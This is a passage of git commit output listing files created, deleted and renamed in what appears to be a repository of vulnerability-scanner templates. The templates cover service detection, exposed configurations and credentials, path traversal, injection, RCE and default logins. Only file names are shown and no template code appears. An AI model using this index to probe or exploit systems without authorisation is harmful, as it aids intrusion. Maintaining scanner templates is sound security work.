mode 100644 poc/detect/gunicorn-detect-7862.yaml delete mode 100644 poc/detect/harbor-detect-7886.yaml delete mode 100644 poc/detect/herokuapp-detect-7937.yaml delete mode 100644 poc/detect/herokuapp-detect-7939.yaml create mode 100644 poc/detect/hikvision-detection-7954.yaml create mode 100644 poc/detect/hikvision-detection-7955.yaml delete mode 100644 poc/detect/hp-blade-admin-detect-8004.yaml create mode 100644 poc/detect/hp-device-info-detect-8009.yaml delete mode 100644 poc/detect/hp-device-info-detect-8010.yaml delete mode 100644 poc/detect/hp-media-vault-detect-8030.yaml create mode 100644 poc/detect/htpasswd-detection-8046.yaml delete mode 100644 poc/detect/itop-detect-8203.yaml delete mode 100644 poc/detect/jaspersoft-detect-8220.yaml create mode 100644 poc/detect/java-rmi-detect-8227.yaml create mode 100644 poc/detect/jboss-detect-8237.yaml delete mode 100644 poc/detect/jboss-detect.yaml delete mode 100644 poc/detect/jeecg-boot-detect-8248.yaml create mode 100644 poc/detect/jellyfin-detect-8259.yaml rename poc/detect/{jellyfin-detect-8258.yaml => jellyfin-detect.yaml} (100%) delete mode 100644 poc/detect/jenkins-detect-8275.yaml create mode 100644 poc/detect/jenkins-detect-8276.yaml create mode 100644 poc/detect/jira-detect-8313.yaml delete mode 100644 poc/detect/jira-detect-8314.yaml delete mode 100644 poc/detect/jsf-detection-8397.yaml create mode 100644 poc/detect/jsf-detection-8398.yaml rename poc/detect/{kibana-detect-8484.yaml => kibana-detect-8483.yaml} (100%) create mode 100644 poc/detect/linkerd-detect-8633.yaml rename poc/detect/{linkerd-detect-8632.yaml => linkerd-detect.yaml} (100%) create mode 100644 poc/detect/linkerd-service-detect-8634.yaml delete mode 100644 poc/detect/magmi-detect-8715.yaml create mode 100644 poc/detect/magmi-detect-8716.yaml delete mode 100644 poc/detect/maian-cart-detect-8719.yaml create mode 100644 poc/detect/maian-cart-detect.yaml create mode 100644 poc/detect/mantis-detect-8780.yaml delete mode 100644 
poc/detect/metabase-detect-8804.yaml create mode 100644 poc/detect/microsoft-exchange-server-detect-8853.yaml create mode 100644 poc/detect/microsoft-exchange-server-detect-8854.yaml create mode 100644 poc/detect/moinmoin-detect-8916.yaml create mode 100644 poc/detect/mongodb-detect-8920.yaml create mode 100644 poc/detect/moveit-detect.yaml delete mode 100644 poc/detect/moveit-transfer-detect.yaml delete mode 100644 poc/detect/ms-adcs-detect-8960.yaml create mode 100644 poc/detect/ms-adcs-detect-8961.yaml create mode 100644 poc/detect/neos-detect.yaml create mode 100644 poc/detect/nextcloud-detect-9079.yaml delete mode 100644 poc/detect/oauth2-detect-9181.yaml delete mode 100644 poc/detect/octobercms-detect-9195.yaml create mode 100644 poc/detect/oidc-detect.yaml create mode 100644 poc/detect/oipm-detect-9219.yaml delete mode 100644 poc/detect/oipm-detect-9222.yaml delete mode 100644 poc/detect/olivetti-crf-detect-9244.yaml create mode 100644 poc/detect/oneblog-detect-9246.yaml create mode 100644 poc/detect/open-virtualization-manager-detect.yaml delete mode 100644 poc/detect/openemr-detect-9271.yaml create mode 100644 poc/detect/openemr-detect-9274.yaml delete mode 100644 poc/detect/opensis-detect-9313.yaml delete mode 100644 poc/detect/oracle-dbass-detect-9351.yaml delete mode 100644 poc/detect/oracle-dbass-detect.yaml create mode 100644 poc/detect/owasp-juice-shop-detected-9416.yaml rename poc/detect/{owasp-juice-shop-detected-9418.yaml => owasp-juice-shop-detected.yaml} (100%) delete mode 100644 poc/detect/pega-detect.yaml delete mode 100644 poc/detect/php-proxy-detect.yaml create mode 100644 poc/detect/phpcollab-detect-9499.yaml delete mode 100644 poc/detect/pi-hole-detect-9581.yaml create mode 100644 poc/detect/pi-hole-detect-9582.yaml delete mode 100644 poc/detect/plone-cms-detect-9607.yaml rename poc/detect/{plone-cms-detect.yaml => plone-cms-detect-9608.yaml} (100%) create mode 100644 poc/detect/prestashop-detect-9651.yaml delete mode 100644 
poc/detect/prestashop-detect.yaml delete mode 100644 poc/detect/prtg-detect-9706.yaml delete mode 100644 poc/detect/puppet-node-manager-detect-9720.yaml create mode 100644 poc/detect/puppet-node-manager-detect.yaml delete mode 100644 poc/detect/puppetserver-detect-9722.yaml create mode 100644 poc/detect/redmine-cli-detect-9854.yaml create mode 100644 poc/detect/rhymix-cms-detect-9878.yaml delete mode 100644 poc/detect/rseenet-detect-9916.yaml create mode 100644 poc/detect/rseenet-detect.yaml delete mode 100644 poc/detect/rstudio-detect-9917.yaml create mode 100644 poc/detect/rstudio-detect-9919.yaml delete mode 100644 poc/detect/sap-netweaver-detect-10047.yaml delete mode 100644 poc/detect/sap-recon-detect-10063.yaml create mode 100644 poc/detect/sceditor-detect-10093.yaml create mode 100644 poc/detect/secmail-detect-10109.yaml delete mode 100644 poc/detect/secmail-detect-10112.yaml create mode 100644 poc/detect/seeddms-detect-10131.yaml delete mode 100644 poc/detect/shiro-detect-10196.yaml delete mode 100644 poc/detect/shopware-detect-10211.yaml delete mode 100644 poc/detect/smartstore-detect.yaml create mode 100644 poc/detect/sonicwall-email-security-detect-10384.yaml delete mode 100644 poc/detect/sonicwall-email-security-detect.yaml create mode 100644 poc/detect/tableau-server-detect-10643.yaml delete mode 100644 poc/detect/tableau-server-detect.yaml create mode 100644 poc/detect/tech-detect-10672.yaml delete mode 100644 poc/detect/tech-detect-10673.yaml delete mode 100644 poc/detect/telerik-dialoghandler-detect-10690.yaml create mode 100644 poc/detect/telerik-dialoghandler-detect-10691.yaml create mode 100644 poc/detect/thinkcmf-detection-10719.yaml create mode 100644 poc/detect/tibco-spotfire-services-detect.yaml create mode 100644 poc/detect/unauthorized-puppet-node-manager-detect-10958.yaml delete mode 100644 poc/detect/unauthorized-puppet-node-manager-detect-10959.yaml delete mode 100644 poc/detect/virtual-ema-detect-11024.yaml create mode 100644 
poc/detect/virtual-ema-detect-11025.yaml rename poc/detect/{vmware-vrealize-detect-11057.yaml => vmware-vrealize-detect.yaml} (100%) delete mode 100644 poc/detect/vsftpd-detection-11073.yaml create mode 100644 poc/detect/vsftpd-detection-11075.yaml delete mode 100644 poc/detect/waf-detect-11086.yaml create mode 100644 poc/detect/waf-detect-11087.yaml create mode 100644 poc/detect/wamp-xdebug-detect-11104.yaml delete mode 100644 poc/detect/web-ftp-detect-11136.yaml create mode 100644 poc/detect/web-suite-detect-11168.yaml delete mode 100644 poc/detect/web-suite-detect.yaml rename poc/detect/{weblogic-t3-detect-11152.yaml => weblogic-t3-detect-11153.yaml} (100%) create mode 100644 poc/detect/wondercms-detect-11222.yaml delete mode 100644 poc/detect/wondercms-detect.yaml rename poc/detect/{wordpress-detect-11261.yaml => wordpress-detect-11260.yaml} (100%) delete mode 100644 poc/detect/wordpress-gotmls-detect-11280.yaml delete mode 100644 poc/detect/worksites-detection-11384.yaml delete mode 100644 poc/detect/wowza-streaming-detect.yaml delete mode 100644 poc/detect/wso2-apimanager-detect-11638.yaml create mode 100644 poc/detect/wuzhicms-detect-11654.yaml create mode 100644 poc/detect/wuzhicms-detect.yaml create mode 100644 poc/detect/yourls-detect.yaml rename poc/detect/{zentao-detect-11787.yaml => zentao-detect-11785.yaml} (100%) delete mode 100644 poc/directory_listing/ecology-springframework-directory-traversal-7175.yaml create mode 100644 poc/directory_listing/ecology-springframework-directory-traversal.yaml delete mode 100644 poc/directory_listing/elfinder-path-traversal-7203.yaml rename poc/directory_listing/{elFinder-path-traversal.yaml => elfinder-path-traversal.yaml} (100%) delete mode 100644 poc/directory_listing/kingdee-eas-directory-traversal.yaml rename poc/directory_listing/{natshell-path-traversal.yaml => natshell-path-traversal-9006.yaml} (100%) delete mode 100644 poc/directory_listing/oa-tongda-path-traversal-9178.yaml delete mode 100644 
poc/directory_listing/oa-tongda-path-traversal-9179.yaml create mode 100644 poc/directory_listing/pmb-directory-traversal.yaml rename poc/directory_listing/{tpshop-directory-traversal-10823.yaml => tpshop-directory-traversal-10821.yaml} (100%) create mode 100644 poc/directory_listing/tpshop-directory-traversal.yaml rename poc/directory_listing/{wooyun-path-traversal.yaml => wooyun-path-traversal-11230.yaml} (100%) delete mode 100644 poc/directory_listing/wooyun-path-traversal-11232.yaml delete mode 100644 poc/docker/amazon-docker-config-280.yaml delete mode 100644 poc/docker/amazon-docker-config-disclosure-278.yaml create mode 100644 poc/docker/amazon-docker-config.yaml delete mode 100644 poc/docker/aws-ecs-container-agent-tasks-641.yaml delete mode 100644 poc/docker/docker-compose-config-7059.yaml create mode 100644 poc/docker/docker-compose-config.yaml delete mode 100644 poc/docker/docker-registry-7068.yaml delete mode 100644 poc/docker/dockercfg-config.yaml create mode 100644 poc/docker/dockerfile-hidden-disclosure-7061.yaml delete mode 100644 poc/docker/dockerfile-hidden-disclosure-7063.yaml create mode 100644 poc/docker/kubernetes-enterprise-manager-8528.yaml delete mode 100644 poc/docker/kubernetes-enterprise-manager-8529.yaml delete mode 100644 poc/docker/kubernetes-kustomization-disclosure.yaml delete mode 100644 poc/docker/kubernetes-metrics.yaml create mode 100644 poc/docker/kubernetes-pods-8542.yaml delete mode 100644 poc/docker/kubernetes-pods-8543.yaml rename poc/docker/{kubernetes-unauth.yaml => kubernetes-unauth(1).yaml} (100%) rename poc/docker/{kubernetes-version.yaml => kubernetes-version-8552.yaml} (100%) rename poc/docker/{misconfigured-docker-8902.yaml => misconfigured-docker-8900.yaml} (100%) delete mode 100644 poc/drupal/drupal-install-7105.yaml delete mode 100644 poc/drupal/drupal-user-enum-ajax-7111.yaml create mode 100644 poc/elk/elasticsearch-sql-client-detect-7190.yaml rename poc/elk/{kibana-detect-8484.yaml => kibana-detect-8483.yaml} 
(100%) create mode 100644 poc/elk/kibana-panel-8485.yaml delete mode 100644 poc/elk/kibana-panel-8486.yaml delete mode 100644 poc/exposed/active-admin-exposure-42.yaml create mode 100644 poc/exposed/active-admin-exposure-43.yaml delete mode 100644 poc/exposed/adobe-connect-username-exposure-100.yaml create mode 100644 poc/exposed/airflow-configuration-exposure-230.yaml delete mode 100644 poc/exposed/airflow-configuration-exposure.yaml delete mode 100644 poc/exposed/amazon-docker-config-disclosure-278.yaml rename poc/exposed/{android-debug-database-exposed-316.yaml => android-debug-database-exposed-314.yaml} (100%) create mode 100644 poc/exposed/ansible-config-disclosure-326.yaml delete mode 100644 poc/exposed/ansible-config-disclosure.yaml create mode 100644 poc/exposed/appspec-yml-disclosure-529.yaml rename poc/exposed/{axiom-digitalocean-key-exposure-667.yaml => axiom-digitalocean-key-exposure.yaml} (100%) create mode 100644 poc/exposed/beward-ipcamera-disclosure-715.yaml rename poc/exposed/{caucho-resin-info-disclosure.yaml => caucho-resin-info-disclosure-871.yaml} (100%) create mode 100644 poc/exposed/cisco-meraki-exposure-944.yaml delete mode 100644 poc/exposed/cisco-meraki-exposure-946.yaml rename poc/exposed/{cisco-smi-exposure-972.yaml => cisco-smi-exposure-971.yaml} (100%) create mode 100644 poc/exposed/clockwork-dashboard-exposure-1015.yaml create mode 100644 poc/exposed/commax-credentials-disclosure-1160.yaml delete mode 100644 poc/exposed/couchdb-exposure-1238.yaml create mode 100644 poc/exposed/couchdb-exposure-1239.yaml create mode 100644 poc/exposed/credentials-disclosure-1256.yaml create mode 100644 poc/exposed/django-debug-exposed-404.yaml create mode 100644 poc/exposed/dockerfile-hidden-disclosure-7061.yaml delete mode 100644 poc/exposed/dockerfile-hidden-disclosure-7063.yaml delete mode 100644 poc/exposed/druid-console-exposure-7092.yaml create mode 100644 poc/exposed/exposed-adb-7282.yaml create mode 100644 
poc/exposed/exposed-alps-spring-7283.yaml create mode 100644 poc/exposed/exposed-bitkeeper-7292.yaml rename poc/exposed/{exposed-darcs-7298.yaml => exposed-darcs-7297.yaml} (100%) create mode 100644 poc/exposed/exposed-docker-api-7301.yaml delete mode 100644 poc/exposed/exposed-gitignore-7303.yaml create mode 100644 poc/exposed/exposed-hg-7312.yaml delete mode 100644 poc/exposed/exposed-jquery-file-upload.yaml create mode 100644 poc/exposed/exposed-kafdrop-7318.yaml delete mode 100644 poc/exposed/exposed-nomad-7328.yaml delete mode 100644 poc/exposed/exposed-nomad-7330.yaml create mode 100644 poc/exposed/exposed-redis-7339.yaml delete mode 100644 poc/exposed/exposed-sharepoint-list-7345.yaml create mode 100644 poc/exposed/exposed-svn-7351.yaml delete mode 100644 poc/exposed/exposed-vscode-7357.yaml create mode 100644 poc/exposed/exposed-vscode.yaml create mode 100644 poc/exposed/exposed-webalizer-7358.yaml delete mode 100644 poc/exposed/exposed-webalizer-7360.yaml delete mode 100644 poc/exposed/exposed-zookeeper-7365.yaml create mode 100644 poc/exposed/fanruanoa2012-disclosure-7389.yaml delete mode 100644 poc/exposed/fanruanoa2012-disclosure.yaml delete mode 100644 poc/exposed/firebase-config-exposure.yaml delete mode 100644 poc/exposed/flink-exposure-7509.yaml create mode 100644 poc/exposed/flink-exposure-7511.yaml delete mode 100644 poc/exposed/ftp-credentials-exposure-7568.yaml create mode 100644 poc/exposed/ftp-credentials-exposure.yaml create mode 100644 poc/exposed/git-credentials-disclosure-7641.yaml rename poc/exposed/{git-credentials-disclosure-7640.yaml => git-credentials-disclosure.yaml} (100%) create mode 100644 poc/exposed/github-workflows-disclosure-7664.yaml delete mode 100644 poc/exposed/github-workflows-disclosure-7666.yaml delete mode 100644 poc/exposed/glpi-telemetry-disclosure-7739.yaml create mode 100644 poc/exposed/gogs-install-exposure-7755.yaml delete mode 100644 poc/exposed/hp-ilo-serial-key-disclosure-8023.yaml create mode 100644 
poc/exposed/hp-ilo-serial-key-disclosure-8025.yaml create mode 100644 poc/exposed/jfrog-unauth-build-exposed-8299.yaml delete mode 100644 poc/exposed/jolokia-info-disclosure-8358.yaml create mode 100644 poc/exposed/jolokia-info-disclosure-8359.yaml delete mode 100644 poc/exposed/kubernetes-kustomization-disclosure.yaml delete mode 100644 poc/exposed/lvmeng-uts-disclosure-8680.yaml create mode 100644 poc/exposed/magento-2-exposed-api-8688.yaml delete mode 100644 poc/exposed/magento-config-disclosure.yaml create mode 100644 poc/exposed/netgear-router-exposure.yaml delete mode 100644 poc/exposed/oracle-ebs-sqllog-disclosure-9369.yaml delete mode 100644 poc/exposed/pgadmin-exposure-9490.yaml create mode 100644 poc/exposed/pgadmin-exposure-9491.yaml rename poc/exposed/{pmb-local-file-disclosure-9620.yaml => pmb-local-file-disclosure-9619.yaml} (100%) create mode 100644 poc/exposed/pmb-local-file-disclosure.yaml delete mode 100644 poc/exposed/prometheus-exposed-panel-9681.yaml rename poc/exposed/{putty-private-key-disclosure-9732.yaml => putty-private-key-disclosure-9730.yaml} (100%) delete mode 100644 poc/exposed/pyproject-disclosure-9737.yaml create mode 100644 poc/exposed/pyproject-disclosure-9738.yaml create mode 100644 poc/exposed/qihang-media-disclosure-9764.yaml create mode 100644 poc/exposed/qihang-media-disclosure.yaml delete mode 100644 poc/exposed/rails-secret-token-disclosure-9809.yaml create mode 100644 poc/exposed/rails-secret-token-disclosure-9810.yaml rename poc/exposed/{roundcube-log-disclosure-9905.yaml => roundcube-log-disclosure-9907.yaml} (100%) create mode 100644 poc/exposed/ruijie-information-disclosure-9931.yaml create mode 100644 poc/exposed/selenium-exposure-10137.yaml delete mode 100644 poc/exposed/selenium-exposure-10138.yaml delete mode 100644 poc/exposed/sensitive-storage-exposure.yaml delete mode 100644 poc/exposed/setup-page-exposure-10181.yaml create mode 100644 poc/exposed/snyk-ignore-file-disclosure-10347.yaml delete mode 100644 
poc/exposed/snyk-ignore-file-disclosure-10349.yaml create mode 100644 poc/exposed/solr-exposure-10364.yaml delete mode 100644 poc/exposed/solr-exposure-10366.yaml delete mode 100644 poc/exposed/thinkphp-509-information-disclosure-10755.yaml rename poc/exposed/{thumbs-db-disclosure.yaml => thumbs-db-disclosure-10763.yaml} (100%) delete mode 100644 poc/exposed/tugboat-config-exposure-10842.yaml rename poc/exposed/{tugboat-config-exposure.yaml => tugboat-config-exposure-10843.yaml} (100%) rename poc/exposed/{watchguard-credentials-disclosure-11106.yaml => watchguard-credentials-disclosure.yaml} (100%) create mode 100644 poc/exposed/wordpress-wpcourses-info-disclosure-11369.yaml delete mode 100644 poc/exposed/wordpress-wpcourses-info-disclosure-11371.yaml create mode 100644 poc/exposed/wp-full-path-disclosure-11455.yaml delete mode 100644 poc/exposed/wp-full-path-disclosure-11457.yaml rename poc/exposed/{yarn-manager-exposure-11733.yaml => yarn-manager-exposure-11731.yaml} (100%) delete mode 100644 poc/exposed/zenphoto-installation-sensitive-info.yaml create mode 100644 poc/exposed/zenphoto-sensitive-info-11784.yaml create mode 100644 poc/extract/extract-urls-7370.yaml delete mode 100644 poc/favicon/favicon-detection-7441.yaml create mode 100644 poc/ftp/crush-ftp-detect-1272.yaml create mode 100644 poc/ftp/crush-ftp-login-1275.yaml create mode 100644 poc/ftp/crushftp-default-login.yaml delete mode 100644 poc/ftp/ftp-credentials-exposure-7568.yaml create mode 100644 poc/ftp/ftp-credentials-exposure.yaml delete mode 100644 poc/ftp/ftp-weak-credentials-7570.yaml rename poc/ftp/{ftpconfig.yaml => ftpconfig-7565.yaml} (100%) delete mode 100644 poc/ftp/unauth-ftp-10942.yaml delete mode 100644 poc/ftp/vsftpd-detection-11073.yaml create mode 100644 poc/ftp/vsftpd-detection-11075.yaml delete mode 100644 poc/ftp/web-ftp-detect-11136.yaml create mode 100644 poc/fuzz/lfi-linux-fuzz.yaml rename poc/gcloud/{GCP-service-account.yaml => GCP-service-account (copy 1).yaml} (100%) create 
mode 100644 poc/gcloud/gcp-service-account-11851.yaml rename poc/git/{axiom-digitalocean-key-exposure-667.yaml => axiom-digitalocean-key-exposure.yaml} (100%) delete mode 100644 poc/git/exposed-gitignore-7303.yaml create mode 100644 poc/git/git-config-7635.yaml rename poc/git/{git-config-nginxoffbyslash-7632.yaml => git-config-nginxoffbyslash-7628.yaml} (100%) create mode 100644 poc/git/git-config-nginxoffbyslash-7630.yaml create mode 100644 poc/git/git-credentials-disclosure-7641.yaml rename poc/git/{git-credentials-disclosure-7640.yaml => git-credentials-disclosure.yaml} (100%) create mode 100644 poc/git/gitbook-takeover-7627.yaml create mode 100644 poc/git/github-enterprise-detect-7649.yaml create mode 100644 poc/git/github-gemfile-files-7653.yaml create mode 100644 poc/git/github-page-config-7654.yaml create mode 100644 poc/git/github-workflows-disclosure-7664.yaml delete mode 100644 poc/git/github-workflows-disclosure-7666.yaml delete mode 100644 poc/git/gitlab-public-repos.yaml delete mode 100644 poc/git/gitlab-public-signup-7683.yaml delete mode 100644 poc/git/gitlab-weak-login.yaml delete mode 100644 poc/git/wordpress-git-config-11278.yaml create mode 100644 poc/google/api-google-drive-432.yaml delete mode 100644 poc/google/api-google-drive.yaml create mode 100644 poc/google/google-earth-dlogin-7781.yaml rename poc/{social/facebook-secrets.yaml => google/google-secrets.yaml} (100%) create mode 100644 poc/google/google-storage-7788.yaml delete mode 100644 poc/graphql/graphql-alias-batching.yaml create mode 100644 poc/graphql/graphql-array-batching.yaml create mode 100644 poc/graphql/graphql-detect-7830.yaml delete mode 100644 poc/graphql/graphql-detect-7831.yaml delete mode 100644 poc/graphql/graphql-get-method.yaml create mode 100644 poc/graphql/hasura-graphql-ssrf-7905.yaml create mode 100644 poc/header/header-command-injection-7919.yaml delete mode 100644 poc/header/host-header-injection-8000.yaml delete mode 100644 poc/header/host-header-poisoning.yaml 
delete mode 100644 poc/header/http-missing-security-headers.yaml create mode 100644 poc/header/log4j-header.yaml create mode 100644 poc/header/oob-header-based-interaction-9250.yaml create mode 100644 poc/header/oob-header-based-interaction.yaml delete mode 100644 poc/header/sqli_header-10504.yaml delete mode 100644 poc/http/apache-httpd-rce-362.yaml delete mode 100644 poc/http/cl-te-http-smuggling.yaml delete mode 100644 poc/http/default-lighttpd-page-6866.yaml delete mode 100644 poc/http/http-missing-security-headers.yaml rename poc/{other/dns-value-share-template-3.yaml => http/http-value-share-template-2.yaml} (100%) delete mode 100644 poc/http/httpbin-open-redirect.yaml delete mode 100644 poc/http/httpbin-panel-8051.yaml create mode 100644 poc/http/httpd-config-8055.yaml delete mode 100644 poc/http/httpd-config.yaml delete mode 100644 poc/http/ibm-http-server.yaml create mode 100644 poc/http/oracle-http-server-12c-9384.yaml create mode 100644 poc/ibm/ibm-advanced-system-management-8088.yaml delete mode 100644 poc/ibm/ibm-advanced-system-management-8090.yaml delete mode 100644 poc/ibm/ibm-http-server.yaml rename poc/ibm/{ibm-note-login-8110.yaml => ibm-note-login-8112.yaml} (100%) delete mode 100644 poc/ibm/ibm-service-assistant-8118.yaml delete mode 100644 poc/injection/buffalo-config-injection-798.yaml create mode 100644 poc/injection/buffalo-config-injection-800.yaml create mode 100644 poc/injection/buffalo-config-injection-801.yaml create mode 100644 poc/injection/crlf-injection-1262.yaml create mode 100644 poc/injection/duomicms-sql-injection-7124.yaml create mode 100644 poc/injection/duomicms-sql-injection.yaml create mode 100644 poc/injection/glpi-9.3.3-sql-injection.yaml create mode 100644 poc/injection/header-command-injection-7919.yaml delete mode 100644 poc/injection/host-header-injection-8000.yaml create mode 100644 poc/java/default-jetty-page-6862.yaml delete mode 100644 poc/java/ecology-springframework-directory-traversal-7175.yaml create mode 
100644 poc/java/ecology-springframework-directory-traversal.yaml create mode 100644 poc/java/exposed-alps-spring-7283.yaml create mode 100644 poc/java/java-rmi-detect-8227.yaml create mode 100644 poc/java/jboss-detect-8237.yaml delete mode 100644 poc/java/jboss-detect.yaml delete mode 100644 poc/java/jetty-showcontexts-enable-8297.yaml create mode 100644 poc/java/jinfornet-jreport-lfi-8307.yaml delete mode 100644 poc/java/jinfornet-jreport-lfi-8308.yaml delete mode 100644 poc/java/jsf-detection-8397.yaml create mode 100644 poc/java/jsf-detection-8398.yaml delete mode 100644 poc/java/public-tomcat-manager-9708.yaml delete mode 100644 poc/java/shiro-detect-10196.yaml delete mode 100644 poc/java/spring-framework-exceptions-10493.yaml create mode 100644 poc/java/spring-framework-exceptions.yaml create mode 100644 poc/java/springForShell-CVE-2022-22963.yaml delete mode 100644 poc/java/springboot-actuator-10435.yaml create mode 100644 poc/java/springboot-actuators-jolokia-xxe-10430.yaml delete mode 100644 poc/java/springboot-actuators-jolokia-xxe-10431.yaml delete mode 100644 poc/java/springboot-autoconfig.yaml create mode 100644 poc/java/springboot-configprops-10442.yaml create mode 100644 poc/java/springboot-env-10450.yaml rename poc/java/{springboot-h2-db-rce-10457.yaml => springboot-h2-db-rce.yaml} (100%) create mode 100644 poc/java/springboot-health-10459.yaml delete mode 100644 poc/java/springboot-health.yaml delete mode 100644 poc/java/springboot-heapdump-10463.yaml create mode 100644 poc/java/springboot-info.yaml delete mode 100644 poc/java/springboot-loggers-10476.yaml create mode 100644 poc/java/springboot-loggers-10477.yaml create mode 100644 poc/java/springboot-mappings-10478.yaml delete mode 100644 poc/java/springboot-mappings-10481.yaml delete mode 100644 poc/java/springboot-threaddump-10486.yaml delete mode 100644 poc/java/springboot-trace.yaml delete mode 100644 poc/java/struts-problem-report-10563.yaml create mode 100644 
poc/java/struts-problem-report-10564.yaml create mode 100644 poc/java/tomcat-default-login.yaml delete mode 100644 poc/java/tomcat-pathnormalization.yaml rename poc/java/{weblogic-t3-detect-11152.yaml => weblogic-t3-detect-11153.yaml} (100%) delete mode 100644 poc/java/weblogic-weak-login-11154.yaml rename poc/java/{webview-addjavascript-interface-11177.yaml => webview-addjavascript-interface-11176.yaml} (100%) rename poc/java/{wildfly-panel-11211.yaml => wildfly-panel-11209.yaml} (100%) delete mode 100644 poc/javascript/bower-json-769.yaml create mode 100644 poc/javascript/bower-json.yaml delete mode 100644 poc/javascript/fastjson-1-2-24-rce.yaml create mode 100644 poc/javascript/fastjson-1-2-41-rce.yaml rename poc/javascript/{fastjson-1-2-42-rce.yaml => fastjson-1-2-42-rce-7408.yaml} (100%) create mode 100644 poc/javascript/fastjson-1-2-43-rce-7412.yaml create mode 100644 poc/javascript/fastjson-1-2-62-rce-7419.yaml delete mode 100644 poc/javascript/jsf-detection-8397.yaml create mode 100644 poc/javascript/jsf-detection-8398.yaml delete mode 100644 poc/javascript/jsherp-boot-panel.yaml rename poc/javascript/{keycloak-json-8472.yaml => keycloak-json-8473.yaml} (100%) create mode 100644 poc/javascript/package-json-9421.yaml delete mode 100644 poc/javascript/package-json.yaml rename poc/javascript/{webview-addjavascript-interface-11177.yaml => webview-addjavascript-interface-11176.yaml} (100%) rename poc/jenkins/{jenkins-default.yaml => jenkins-default-8272.yaml} (100%) delete mode 100644 poc/jenkins/jenkins-detect-8275.yaml create mode 100644 poc/jenkins/jenkins-detect-8276.yaml delete mode 100644 poc/jenkins/jenkins-login-8277.yaml create mode 100644 poc/jenkins/jenkins-login-8280.yaml delete mode 100644 poc/jenkins/jenkins-script-8284.yaml create mode 100644 poc/jenkins/jenkins-script.yaml create mode 100644 poc/jenkins/jenkins-stack-trace-8285.yaml rename poc/joomla/{joomla-com-fabrik-lfi-8371.yaml => joomla-com-fabrik-lfi.yaml} (100%) create mode 100644 
poc/joomla/joomla-file-listing-8380.yaml delete mode 100644 poc/joomla/joomla-file-listing.yaml create mode 100644 poc/joomla/joomla-panel-8389.yaml delete mode 100644 poc/joomla/joomla-panel-8391.yaml delete mode 100644 poc/joomla/joomla-workflow.yaml create mode 100644 poc/joomla/rusty-joomla.yaml create mode 100644 poc/kafka/kafka-center-default-login.yaml create mode 100644 poc/kafka/kafka-consumer-monitor-8424.yaml delete mode 100644 poc/kafka/kafka-consumer-monitor-8425.yaml create mode 100644 poc/kafka/kafka-monitoring-8428.yaml delete mode 100644 poc/kafka/kafka-monitoring-8431.yaml delete mode 100644 poc/laravel/laravel-debug-enabled-8576.yaml delete mode 100644 poc/laravel/laravel-debug-enabled.yaml create mode 100644 poc/laravel/laravel-env-8582.yaml create mode 100644 poc/laravel/laravel-ignition-xss.yaml delete mode 100644 poc/laravel/laravel-log-file-8596.yaml create mode 100644 poc/ldap/phpldapadmin-panel.yaml create mode 100644 poc/local_file_inclusion/accent-microcomputers-lfi-16.yaml delete mode 100644 poc/local_file_inclusion/accent-microcomputers-lfi-17.yaml delete mode 100644 poc/local_file_inclusion/ad-widget-lfi-124.yaml create mode 100644 poc/local_file_inclusion/admin-word-count-column-lfi-81.yaml rename poc/local_file_inclusion/{advanced-access-manager-lfi-118.yaml => advanced-access-manager-lfi-116.yaml} (100%) delete mode 100644 poc/local_file_inclusion/advanced-access-manager-lfi.yaml delete mode 100644 poc/local_file_inclusion/asanhamayesh-lfi-552.yaml create mode 100644 poc/local_file_inclusion/asanhamayesh-lfi-553.yaml delete mode 100644 poc/local_file_inclusion/bems-api-lfi-709.yaml delete mode 100644 poc/local_file_inclusion/bems-api-lfi-712.yaml delete mode 100644 poc/local_file_inclusion/blue-ocean-excellence-lfi-756.yaml delete mode 100644 poc/local_file_inclusion/brandfolder-lfi.yaml delete mode 100644 poc/local_file_inclusion/bullwark-momentum-lfi-807.yaml create mode 100644 poc/local_file_inclusion/cherry-lfi-903.yaml delete 
mode 100644 poc/local_file_inclusion/churchope-lfi.yaml create mode 100644 poc/local_file_inclusion/cs-cart-unauthenticated-lfi-1284.yaml rename poc/local_file_inclusion/{cs-cart-unauthenticated-lfi-1285.yaml => cs-cart-unauthenticated-lfi.yaml} (100%) delete mode 100644 poc/local_file_inclusion/db-backup-lfi-6774.yaml create mode 100644 poc/local_file_inclusion/db-backup-lfi-6775.yaml delete mode 100644 poc/local_file_inclusion/diarise-theme-lfi.yaml delete mode 100644 poc/local_file_inclusion/elfinder-path-traversal-7203.yaml rename poc/local_file_inclusion/{elFinder-path-traversal.yaml => elfinder-path-traversal.yaml} (100%) delete mode 100644 poc/local_file_inclusion/elfinder-version.yaml create mode 100644 poc/local_file_inclusion/generic-windows-lfi-7591.yaml create mode 100644 poc/local_file_inclusion/global-domains-lfi.yaml delete mode 100644 poc/local_file_inclusion/goip-1-lfi-7764.yaml create mode 100644 poc/local_file_inclusion/groupoffice-lfi-7849.yaml create mode 100644 poc/local_file_inclusion/groupoffice-lfi.yaml create mode 100644 poc/local_file_inclusion/gsoap-lfi.yaml delete mode 100644 poc/local_file_inclusion/hide-security-enhancer-lfi.yaml delete mode 100644 poc/local_file_inclusion/huawei-hg255s-lfi-8060.yaml delete mode 100644 poc/local_file_inclusion/huawei-hg659-lfi.yaml create mode 100644 poc/local_file_inclusion/issuu-panel-lfi.yaml delete mode 100644 poc/local_file_inclusion/jeewms-lfi.yaml create mode 100644 poc/local_file_inclusion/jinfornet-jreport-lfi-8307.yaml delete mode 100644 poc/local_file_inclusion/jinfornet-jreport-lfi-8308.yaml create mode 100644 poc/local_file_inclusion/jolokia-unauthenticated-lfi-8366.yaml rename poc/local_file_inclusion/{jolokia-unauthenticated-lfi-8364.yaml => jolokia-unauthenticated-lfi.yaml} (100%) rename poc/local_file_inclusion/{joomla-com-fabrik-lfi-8371.yaml => joomla-com-fabrik-lfi.yaml} (100%) create mode 100644 poc/local_file_inclusion/lfi-linux-fuzz.yaml create mode 100644 
